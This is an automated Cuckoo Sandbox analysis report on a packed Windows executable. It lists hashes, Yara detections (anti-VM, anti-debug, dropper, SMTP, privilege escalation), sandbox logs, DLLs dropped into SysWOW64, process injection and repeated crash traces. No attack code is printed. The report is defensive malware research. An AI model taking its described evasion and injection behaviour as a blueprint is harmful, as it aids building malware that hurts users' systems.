Cuckoo Sandbox

File 505cb6e050387f3649a5edee7b96a69135ffafd51f0a805ae2d5c07b203cf5e2

Summary
Download Resubmit sample

Size	75.6KB
Type	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
MD5	`d57cc2304c405554af3832ee80e8d8d0`
SHA1	`c90a1020ecb7c5065b5750d980682af844ac1f98`
SHA256	`505cb6e050387f3649a5edee7b96a69135ffafd51f0a805ae2d5c07b203cf5e2`
SHA512	`efbd016904aa1ad3fdc3d13b183ff5989cd3e92fa30829a12b9936916c1ef1d48765538d1c56d50fe26cca7d8e902f943dd35f33a959f5a99cebe1b24d493a4c`
CRC32	`AAEFBF2F`
ssdeep	`None`
Yara	vmdetect - Possibly employs anti-virtualization techniques anti_dbg - Checks if being debugged network_udp_sock - Communications over UDP network network_tcp_listen - Listen for incoming communication network_smtp_raw - Communications smtp network_dropper - File downloader/dropper network_tcp_socket - Communications over RAW socket network_dns - Communications use DNS escalate_priv - Escalade priviledges win_mutex - Create or check mutex

Score

This file is very suspicious, with a score of 10 out of 10!

Please notice: The scoring system is currently still in development and should be considered an alpha feature.

Autosubmit

5848426

5848427

Feedback

Expecting different results? Send us this analysis and we will inspect it. Click here

Information on Execution

Analysis

Category	Started	Completed	Duration	Routing	Logs
FILE	Jan. 25, 2025, 9:06 a.m.	Jan. 25, 2025, 9:13 a.m.	419 seconds	internet	Show Analyzer Log Show Cuckoo Log

Analyzer Log

2025-01-21 09:10:50,030 [analyzer] DEBUG: Starting analyzer from: C:\tmpqqrt4a
2025-01-21 09:10:50,046 [analyzer] DEBUG: Pipe server name: \??\PIPE\wRFpHCEQZMVautmIy
2025-01-21 09:10:50,046 [analyzer] DEBUG: Log pipe server name: \??\PIPE\vfaqqtzRhOEjHpXlXedJYvfB
2025-01-21 09:10:50,328 [analyzer] DEBUG: Started auxiliary module Curtain
2025-01-21 09:10:50,328 [analyzer] DEBUG: Started auxiliary module DbgView
2025-01-21 09:10:50,983 [analyzer] DEBUG: Started auxiliary module Disguise
2025-01-21 09:10:51,203 [analyzer] DEBUG: Loaded monitor into process with pid 504
2025-01-21 09:10:51,203 [analyzer] DEBUG: Started auxiliary module DumpTLSMasterSecrets
2025-01-21 09:10:51,203 [analyzer] DEBUG: Started auxiliary module Human
2025-01-21 09:10:51,203 [analyzer] DEBUG: Started auxiliary module InstallCertificate
2025-01-21 09:10:51,203 [analyzer] DEBUG: Started auxiliary module Reboot
2025-01-21 09:10:51,296 [analyzer] DEBUG: Started auxiliary module RecentFiles
2025-01-21 09:10:51,296 [analyzer] DEBUG: Started auxiliary module Screenshots
2025-01-21 09:10:51,296 [analyzer] DEBUG: Started auxiliary module Sysmon
2025-01-21 09:10:51,296 [analyzer] DEBUG: Started auxiliary module LoadZer0m0n
2025-01-21 09:10:51,437 [lib.api.process] INFO: Successfully executed process from path u'C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\505cb6e050387f3649a5edee7b96a69135ffafd51f0a805ae2d5c07b203cf5e2.exe' with arguments '' and pid 668
2025-01-21 09:10:51,655 [analyzer] DEBUG: Loaded monitor into process with pid 668
2025-01-21 09:10:51,655 [analyzer] INFO: Added new file to list with pid 668 and path C:\Windows\SysWOW64\ctfmen.exe
2025-01-21 09:10:51,717 [analyzer] INFO: Added new file to list with pid 668 and path C:\Windows\SysWOW64\shervans.dll
2025-01-21 09:10:51,733 [analyzer] INFO: Added new file to list with pid 668 and path C:\Windows\SysWOW64\grcopy.dll
2025-01-21 09:10:51,828 [analyzer] INFO: Added new file to list with pid 668 and path C:\Windows\SysWOW64\satornas.dll
2025-01-21 09:10:55,905 [analyzer] INFO: Injected into process with pid 2496 and name u'ctfmen.exe'
2025-01-21 09:10:56,062 [analyzer] DEBUG: Loaded monitor into process with pid 2496
2025-01-21 09:10:56,140 [analyzer] INFO: Injected into process with pid 1560 and name u'smnss.exe'
2025-01-21 09:10:56,328 [analyzer] DEBUG: Loaded monitor into process with pid 1560
2025-01-21 09:10:56,342 [analyzer] INFO: Added new file to list with pid 1560 and path C:\Windows\SysWOW64\zipfi.dll
2025-01-21 09:10:56,453 [analyzer] INFO: Process with pid 668 has terminated
2025-01-21 09:10:56,453 [analyzer] INFO: Added new file to list with pid 1560 and path C:\Windows\SysWOW64\zipfiaq.dll
2025-01-21 09:10:57,453 [analyzer] INFO: Process with pid 2496 has terminated
2025-01-21 09:11:20,453 [analyzer] INFO: Analysis timeout hit, terminating analysis.
2025-01-21 09:11:21,000 [analyzer] INFO: Terminating remaining processes before shutdown.
2025-01-21 09:11:21,000 [lib.api.process] INFO: Successfully terminated process with pid 1560.
2025-01-21 09:11:21,046 [analyzer] INFO: Analysis completed.

Cuckoo Log

2025-01-25 09:06:06,986 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:08,020 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:09,162 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:10,193 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:11,225 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:12,253 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:13,281 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:14,309 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:15,404 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:16,497 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:17,525 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:18,543 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:19,562 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:20,588 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:21,619 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:22,647 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:23,669 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:24,692 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:25,724 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:26,750 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:27,769 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:28,792 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:29,821 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:30,858 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:31,883 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:32,903 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:33,929 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:34,951 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:35,973 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:37,026 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:38,072 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:39,112 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:40,276 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:41,334 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:42,377 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:43,433 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:44,504 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:45,553 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:46,606 [cuckoo.core.scheduler] DEBUG: Task #5822691: no machine available yet
2025-01-25 09:06:47,664 [cuckoo.core.scheduler] INFO: Task #5822691: acquired machine win7x6428 (label=win7x6428)
2025-01-25 09:06:47,666 [cuckoo.core.resultserver] DEBUG: Now tracking machine 192.168.168.228 for task #5822691
2025-01-25 09:06:48,073 [cuckoo.auxiliary.sniffer] INFO: Started sniffer with PID 1483394 (interface=vboxnet0, host=192.168.168.228)
2025-01-25 09:06:48,223 [cuckoo.machinery.virtualbox] DEBUG: Starting vm win7x6428
2025-01-25 09:06:49,140 [cuckoo.machinery.virtualbox] DEBUG: Restoring virtual machine win7x6428 to vmcloak
2025-01-25 09:09:36,643 [cuckoo.core.guest] INFO: Starting analysis #5822691 on guest (id=win7x6428, ip=192.168.168.228)
2025-01-25 09:09:37,686 [cuckoo.core.guest] DEBUG: win7x6428: not ready yet
2025-01-25 09:09:42,729 [cuckoo.core.guest] INFO: Guest is running Cuckoo Agent 0.10 (id=win7x6428, ip=192.168.168.228)
2025-01-25 09:09:42,836 [cuckoo.core.guest] DEBUG: Uploading analyzer to guest (id=win7x6428, ip=192.168.168.228, monitor=latest, size=6660546)
2025-01-25 09:09:44,176 [cuckoo.core.resultserver] DEBUG: Task #5822691: live log analysis.log initialized.
2025-01-25 09:09:45,327 [cuckoo.core.resultserver] DEBUG: Task #5822691 is sending a BSON stream
2025-01-25 09:09:45,760 [cuckoo.core.resultserver] DEBUG: Task #5822691 is sending a BSON stream
2025-01-25 09:09:46,737 [cuckoo.core.resultserver] DEBUG: Task #5822691: File upload for 'shots/0001.jpg'
2025-01-25 09:09:46,785 [cuckoo.core.resultserver] DEBUG: Task #5822691 uploaded file length: 133462
2025-01-25 09:09:50,166 [cuckoo.core.resultserver] DEBUG: Task #5822691 is sending a BSON stream
2025-01-25 09:09:50,416 [cuckoo.core.resultserver] DEBUG: Task #5822691 is sending a BSON stream
2025-01-25 09:09:58,851 [cuckoo.core.guest] DEBUG: win7x6428: analysis #5822691 still processing
2025-01-25 09:10:13,956 [cuckoo.core.guest] DEBUG: win7x6428: analysis #5822691 still processing
2025-01-25 09:10:14,896 [cuckoo.core.resultserver] DEBUG: Task #5822691: File upload for 'curtain/1737447080.7.curtain.log'
2025-01-25 09:10:14,899 [cuckoo.core.resultserver] DEBUG: Task #5822691 uploaded file length: 36
2025-01-25 09:10:15,169 [cuckoo.core.resultserver] DEBUG: Task #5822691: File upload for 'sysmon/1737447080.98.sysmon.xml'
2025-01-25 09:10:15,193 [cuckoo.core.resultserver] DEBUG: Task #5822691 uploaded file length: 1829434
2025-01-25 09:10:15,211 [cuckoo.core.resultserver] DEBUG: Task #5822691: File upload for 'files/54b8bd60fc3eabf4_grcopy.dll'
2025-01-25 09:10:15,239 [cuckoo.core.resultserver] DEBUG: Task #5822691 uploaded file length: 77445
2025-01-25 09:10:15,248 [cuckoo.core.resultserver] DEBUG: Task #5822691: File upload for 'files/148a0a0924609c80_zipfi.dll'
2025-01-25 09:10:15,251 [cuckoo.core.resultserver] DEBUG: Task #5822691: File upload for 'files/63488a12a838c317_ctfmen.exe'
2025-01-25 09:10:15,253 [cuckoo.core.resultserver] DEBUG: Task #5822691 uploaded file length: 4160
2025-01-25 09:10:15,254 [cuckoo.core.resultserver] DEBUG: Task #5822691: File upload for 'files/102117c293b95753_zipfiaq.dll'
2025-01-25 09:10:15,256 [cuckoo.core.resultserver] DEBUG: Task #5822691: File upload for 'files/c802dedc75563502_satornas.dll'
2025-01-25 09:10:15,258 [cuckoo.core.resultserver] DEBUG: Task #5822691 uploaded file length: 183
2025-01-25 09:10:15,259 [cuckoo.core.resultserver] DEBUG: Task #5822691: File upload for 'files/63c6baedc304dd34_shervans.dll'
2025-01-25 09:10:15,261 [cuckoo.core.resultserver] DEBUG: Task #5822691 uploaded file length: 8704
2025-01-25 09:10:15,262 [cuckoo.core.resultserver] DEBUG: Task #5822691 uploaded file length: 77559
2025-01-25 09:10:15,264 [cuckoo.core.resultserver] DEBUG: Task #5822691 uploaded file length: 77563
2025-01-25 09:10:15,736 [cuckoo.core.resultserver] DEBUG: Task #5822691 had connection reset for <Context for LOG>
2025-01-25 09:10:16,972 [cuckoo.core.guest] INFO: win7x6428: analysis completed successfully
2025-01-25 09:10:16,989 [cuckoo.core.plugins] DEBUG: Stopped auxiliary module: Redsocks
2025-01-25 09:10:17,020 [cuckoo.core.plugins] DEBUG: Stopped auxiliary module: Sniffer
2025-01-25 09:10:18,433 [cuckoo.machinery.virtualbox] INFO: Successfully generated memory dump for virtual machine with label win7x6428 to path /srv/cuckoo/cwd/storage/analyses/5822691/memory.dmp
2025-01-25 09:10:18,453 [cuckoo.machinery.virtualbox] DEBUG: Stopping vm win7x6428
2025-01-25 09:13:05,762 [cuckoo.core.resultserver] DEBUG: Stopped tracking machine 192.168.168.228 for task #5822691
2025-01-25 09:13:06,193 [cuckoo.core.scheduler] DEBUG: Released database task #5822691
2025-01-25 09:13:06,214 [cuckoo.core.scheduler] INFO: Task #5822691: analysis procedure completed

Signatures

Yara rules detected for file (10 events)

description	Possibly employs anti-virtualization techniques	rule	vmdetect
description	Checks if being debugged	rule	anti_dbg
description	Communications over UDP network	rule	network_udp_sock
description	Listen for incoming communication	rule	network_tcp_listen
description	Communications smtp	rule	network_smtp_raw
description	File downloader/dropper	rule	network_dropper
description	Communications over RAW socket	rule	network_tcp_socket
description	Communications use DNS	rule	network_dns
description	Escalade priviledges	rule	escalate_priv
description	Create or check mutex	rule	win_mutex

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Jan. 21, 2025, 10:10 a.m.			0	0
IsDebuggerPresent Jan. 21, 2025, 10:10 a.m.			0	0

Tries to locate where the browsers are installed (1 event)

file	C:\Program Files (x86)\Mozilla Firefox\browser\blocklist.xml

The executable contains unknown PE section names indicative of a packer (could be a false positive) (4 events)

section	y901bdip
section	395zfvyb
section	4008cvbx
section

The executable uses a known packer (1 event)

packer

MinGW GCC 3.x

One or more processes crashed (14 events)

Time & API	Arguments	Status
__exception__ Jan. 21, 2025, 10:11 a.m.	stacktrace: RtlImageNtHeader+0x423 RtlDeleteCriticalSection-0x106e ntdll+0x335b7 @ 0x77e535b7 RtlImageNtHeader+0x30e RtlDeleteCriticalSection-0x1183 ntdll+0x334a2 @ 0x77e534a2 GlobalFree+0x27 HeapCreate-0x11f kernelbase+0x1537d @ 0x7730537d smnss+0x6187 @ 0x406187 smnss+0x5fac @ 0x405fac smnss+0x2f1d @ 0x402f1d BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133aa @ 0x75e433aa RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa5 ntdll+0x39f72 @ 0x77e59f72 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xd2 ntdll+0x39f45 @ 0x77e59f45 exception.instruction_r: 32 4e 02 f6 c1 01 0f 84 f5 10 00 00 83 7f 4c 00 exception.symbol: RtlImageNtHeader+0x11c RtlDeleteCriticalSection-0x1375 ntdll+0x332b0 exception.instruction: xor cl, byte ptr [esi + 2] exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 209584 exception.address: 0x77e532b0 registers.esp: 68221120 registers.edi: 6684672 registers.eax: 1048576 registers.ebp: 68221160 registers.edx: 2047 registers.ebx: 8855144 registers.esi: 8344784 registers.ecx: 0	1
__exception__ Jan. 21, 2025, 10:11 a.m.	stacktrace: RtlImageNtHeader+0x423 RtlDeleteCriticalSection-0x106e ntdll+0x335b7 @ 0x77e535b7 RtlImageNtHeader+0x30e RtlDeleteCriticalSection-0x1183 ntdll+0x334a2 @ 0x77e534a2 GlobalFree+0x27 HeapCreate-0x11f kernelbase+0x1537d @ 0x7730537d smnss+0x6187 @ 0x406187 smnss+0x5fac @ 0x405fac smnss+0x2f1d @ 0x402f1d BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133aa @ 0x75e433aa RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa5 ntdll+0x39f72 @ 0x77e59f72 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xd2 ntdll+0x39f45 @ 0x77e59f45 exception.instruction_r: 32 4e 02 f6 c1 01 0f 84 f5 10 00 00 83 7f 4c 00 exception.symbol: RtlImageNtHeader+0x11c RtlDeleteCriticalSection-0x1375 ntdll+0x332b0 exception.instruction: xor cl, byte ptr [esi + 2] exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 209584 exception.address: 0x77e532b0 registers.esp: 66123968 registers.edi: 6684672 registers.eax: 1048576 registers.ebp: 66124008 registers.edx: 2047 registers.ebx: 8855048 registers.esi: 8344976 registers.ecx: 0	1
__exception__ Jan. 21, 2025, 10:11 a.m.	stacktrace: RtlImageNtHeader+0x423 RtlDeleteCriticalSection-0x106e ntdll+0x335b7 @ 0x77e535b7 RtlImageNtHeader+0x30e RtlDeleteCriticalSection-0x1183 ntdll+0x334a2 @ 0x77e534a2 GlobalFree+0x27 HeapCreate-0x11f kernelbase+0x1537d @ 0x7730537d smnss+0x6187 @ 0x406187 smnss+0x5fac @ 0x405fac smnss+0x2f1d @ 0x402f1d BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133aa @ 0x75e433aa RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa5 ntdll+0x39f72 @ 0x77e59f72 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xd2 ntdll+0x39f45 @ 0x77e59f45 exception.instruction_r: 32 4e 02 f6 c1 01 0f 84 f5 10 00 00 83 7f 4c 00 exception.symbol: RtlImageNtHeader+0x11c RtlDeleteCriticalSection-0x1375 ntdll+0x332b0 exception.instruction: xor cl, byte ptr [esi + 2] exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 209584 exception.address: 0x77e532b0 registers.esp: 70318272 registers.edi: 6684672 registers.eax: 1048576 registers.ebp: 70318312 registers.edx: 2047 registers.ebx: 8854952 registers.esi: 8344784 registers.ecx: 0	1
__exception__ Jan. 21, 2025, 10:11 a.m.	stacktrace: RtlImageNtHeader+0x423 RtlDeleteCriticalSection-0x106e ntdll+0x335b7 @ 0x77e535b7 RtlImageNtHeader+0x30e RtlDeleteCriticalSection-0x1183 ntdll+0x334a2 @ 0x77e534a2 GlobalFree+0x27 HeapCreate-0x11f kernelbase+0x1537d @ 0x7730537d smnss+0x6187 @ 0x406187 smnss+0x5fac @ 0x405fac smnss+0x2f1d @ 0x402f1d BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133aa @ 0x75e433aa RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa5 ntdll+0x39f72 @ 0x77e59f72 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xd2 ntdll+0x39f45 @ 0x77e59f45 exception.instruction_r: 32 4e 02 f6 c1 01 0f 84 f5 10 00 00 83 7f 4c 00 exception.symbol: RtlImageNtHeader+0x11c RtlDeleteCriticalSection-0x1375 ntdll+0x332b0 exception.instruction: xor cl, byte ptr [esi + 2] exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 209584 exception.address: 0x77e532b0 registers.esp: 72415424 registers.edi: 6684672 registers.eax: 1048576 registers.ebp: 72415464 registers.edx: 2047 registers.ebx: 8857016 registers.esi: 8346912 registers.ecx: 0	1
__exception__ Jan. 21, 2025, 10:11 a.m.	stacktrace: RtlImageNtHeader+0x423 RtlDeleteCriticalSection-0x106e ntdll+0x335b7 @ 0x77e535b7 RtlImageNtHeader+0x30e RtlDeleteCriticalSection-0x1183 ntdll+0x334a2 @ 0x77e534a2 GlobalFree+0x27 HeapCreate-0x11f kernelbase+0x1537d @ 0x7730537d smnss+0x6187 @ 0x406187 smnss+0x5fac @ 0x405fac smnss+0x2f1d @ 0x402f1d BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133aa @ 0x75e433aa RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa5 ntdll+0x39f72 @ 0x77e59f72 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xd2 ntdll+0x39f45 @ 0x77e59f45 exception.instruction_r: 32 4e 02 f6 c1 01 0f 84 f5 10 00 00 83 7f 4c 00 exception.symbol: RtlImageNtHeader+0x11c RtlDeleteCriticalSection-0x1375 ntdll+0x332b0 exception.instruction: xor cl, byte ptr [esi + 2] exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 209584 exception.address: 0x77e532b0 registers.esp: 74512576 registers.edi: 6684672 registers.eax: 1048576 registers.ebp: 74512616 registers.edx: 2047 registers.ebx: 8855000 registers.esi: 8344912 registers.ecx: 0	1
__exception__ Jan. 21, 2025, 10:11 a.m.	stacktrace: RtlImageNtHeader+0x423 RtlDeleteCriticalSection-0x106e ntdll+0x335b7 @ 0x77e535b7 RtlImageNtHeader+0x30e RtlDeleteCriticalSection-0x1183 ntdll+0x334a2 @ 0x77e534a2 GlobalFree+0x27 HeapCreate-0x11f kernelbase+0x1537d @ 0x7730537d smnss+0x6187 @ 0x406187 smnss+0x5fac @ 0x405fac smnss+0x2f1d @ 0x402f1d BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133aa @ 0x75e433aa RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa5 ntdll+0x39f72 @ 0x77e59f72 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xd2 ntdll+0x39f45 @ 0x77e59f45 exception.instruction_r: 32 4e 02 f6 c1 01 0f 84 f5 10 00 00 83 7f 4c 00 exception.symbol: RtlImageNtHeader+0x11c RtlDeleteCriticalSection-0x1375 ntdll+0x332b0 exception.instruction: xor cl, byte ptr [esi + 2] exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 209584 exception.address: 0x77e532b0 registers.esp: 76609728 registers.edi: 6684672 registers.eax: 1048576 registers.ebp: 76609768 registers.edx: 2047 registers.ebx: 8854360 registers.esi: 8344160 registers.ecx: 0	1
__exception__ Jan. 21, 2025, 10:11 a.m.	stacktrace: RtlImageNtHeader+0x423 RtlDeleteCriticalSection-0x106e ntdll+0x335b7 @ 0x77e535b7 RtlImageNtHeader+0x30e RtlDeleteCriticalSection-0x1183 ntdll+0x334a2 @ 0x77e534a2 GlobalFree+0x27 HeapCreate-0x11f kernelbase+0x1537d @ 0x7730537d smnss+0x6187 @ 0x406187 smnss+0x5fac @ 0x405fac smnss+0x2f1d @ 0x402f1d BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133aa @ 0x75e433aa RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa5 ntdll+0x39f72 @ 0x77e59f72 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xd2 ntdll+0x39f45 @ 0x77e59f45 exception.instruction_r: 32 4e 02 f6 c1 01 0f 84 f5 10 00 00 83 7f 4c 00 exception.symbol: RtlImageNtHeader+0x11c RtlDeleteCriticalSection-0x1375 ntdll+0x332b0 exception.instruction: xor cl, byte ptr [esi + 2] exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 209584 exception.address: 0x77e532b0 registers.esp: 80804032 registers.edi: 6684672 registers.eax: 1048576 registers.ebp: 80804072 registers.edx: 2047 registers.ebx: 8854616 registers.esi: 8344624 registers.ecx: 0	1
__exception__ Jan. 21, 2025, 10:11 a.m.	stacktrace: RtlImageNtHeader+0x423 RtlDeleteCriticalSection-0x106e ntdll+0x335b7 @ 0x77e535b7 RtlImageNtHeader+0x30e RtlDeleteCriticalSection-0x1183 ntdll+0x334a2 @ 0x77e534a2 GlobalFree+0x27 HeapCreate-0x11f kernelbase+0x1537d @ 0x7730537d smnss+0x6187 @ 0x406187 smnss+0x5fac @ 0x405fac smnss+0x2f1d @ 0x402f1d BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133aa @ 0x75e433aa RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa5 ntdll+0x39f72 @ 0x77e59f72 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xd2 ntdll+0x39f45 @ 0x77e59f45 exception.instruction_r: 32 4e 02 f6 c1 01 0f 84 f5 10 00 00 83 7f 4c 00 exception.symbol: RtlImageNtHeader+0x11c RtlDeleteCriticalSection-0x1375 ntdll+0x332b0 exception.instruction: xor cl, byte ptr [esi + 2] exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 209584 exception.address: 0x77e532b0 registers.esp: 76609728 registers.edi: 6684672 registers.eax: 1048576 registers.ebp: 76609768 registers.edx: 2047 registers.ebx: 8854744 registers.esi: 8344656 registers.ecx: 0	1
__exception__ Jan. 21, 2025, 10:11 a.m.	stacktrace: RtlImageNtHeader+0x423 RtlDeleteCriticalSection-0x106e ntdll+0x335b7 @ 0x77e535b7 RtlImageNtHeader+0x30e RtlDeleteCriticalSection-0x1183 ntdll+0x334a2 @ 0x77e534a2 GlobalFree+0x27 HeapCreate-0x11f kernelbase+0x1537d @ 0x7730537d smnss+0x6187 @ 0x406187 smnss+0x5fac @ 0x405fac smnss+0x2f1d @ 0x402f1d BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133aa @ 0x75e433aa RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa5 ntdll+0x39f72 @ 0x77e59f72 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xd2 ntdll+0x39f45 @ 0x77e59f45 exception.instruction_r: 32 4e 02 f6 c1 01 0f 84 f5 10 00 00 83 7f 4c 00 exception.symbol: RtlImageNtHeader+0x11c RtlDeleteCriticalSection-0x1375 ntdll+0x332b0 exception.instruction: xor cl, byte ptr [esi + 2] exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 209584 exception.address: 0x77e532b0 registers.esp: 82901184 registers.edi: 6684672 registers.eax: 1048576 registers.ebp: 82901224 registers.edx: 2047 registers.ebx: 8854536 registers.esi: 8344336 registers.ecx: 0	1
__exception__ Jan. 21, 2025, 10:11 a.m.	stacktrace: RtlImageNtHeader+0x423 RtlDeleteCriticalSection-0x106e ntdll+0x335b7 @ 0x77e535b7 RtlImageNtHeader+0x30e RtlDeleteCriticalSection-0x1183 ntdll+0x334a2 @ 0x77e534a2 GlobalFree+0x27 HeapCreate-0x11f kernelbase+0x1537d @ 0x7730537d smnss+0x6187 @ 0x406187 smnss+0x5fac @ 0x405fac smnss+0x2f1d @ 0x402f1d BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133aa @ 0x75e433aa RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa5 ntdll+0x39f72 @ 0x77e59f72 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xd2 ntdll+0x39f45 @ 0x77e59f45 exception.instruction_r: 32 4e 02 f6 c1 01 0f 84 f5 10 00 00 83 7f 4c 00 exception.symbol: RtlImageNtHeader+0x11c RtlDeleteCriticalSection-0x1375 ntdll+0x332b0 exception.instruction: xor cl, byte ptr [esi + 2] exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 209584 exception.address: 0x77e532b0 registers.esp: 84998336 registers.edi: 6684672 registers.eax: 1048576 registers.ebp: 84998376 registers.edx: 2047 registers.ebx: 8855480 registers.esi: 8345504 registers.ecx: 0	1
__exception__ Jan. 21, 2025, 10:11 a.m.	stacktrace: RtlImageNtHeader+0x423 RtlDeleteCriticalSection-0x106e ntdll+0x335b7 @ 0x77e535b7 RtlImageNtHeader+0x30e RtlDeleteCriticalSection-0x1183 ntdll+0x334a2 @ 0x77e534a2 GlobalFree+0x27 HeapCreate-0x11f kernelbase+0x1537d @ 0x7730537d smnss+0x6187 @ 0x406187 smnss+0x5fac @ 0x405fac smnss+0x2f1d @ 0x402f1d BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133aa @ 0x75e433aa RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa5 ntdll+0x39f72 @ 0x77e59f72 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xd2 ntdll+0x39f45 @ 0x77e59f45 exception.instruction_r: 32 4e 02 f6 c1 01 0f 84 f5 10 00 00 83 7f 4c 00 exception.symbol: RtlImageNtHeader+0x11c RtlDeleteCriticalSection-0x1375 ntdll+0x332b0 exception.instruction: xor cl, byte ptr [esi + 2] exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 209584 exception.address: 0x77e532b0 registers.esp: 87095488 registers.edi: 6684672 registers.eax: 1048576 registers.ebp: 87095528 registers.edx: 2047 registers.ebx: 8855432 registers.esi: 8345280 registers.ecx: 0	1
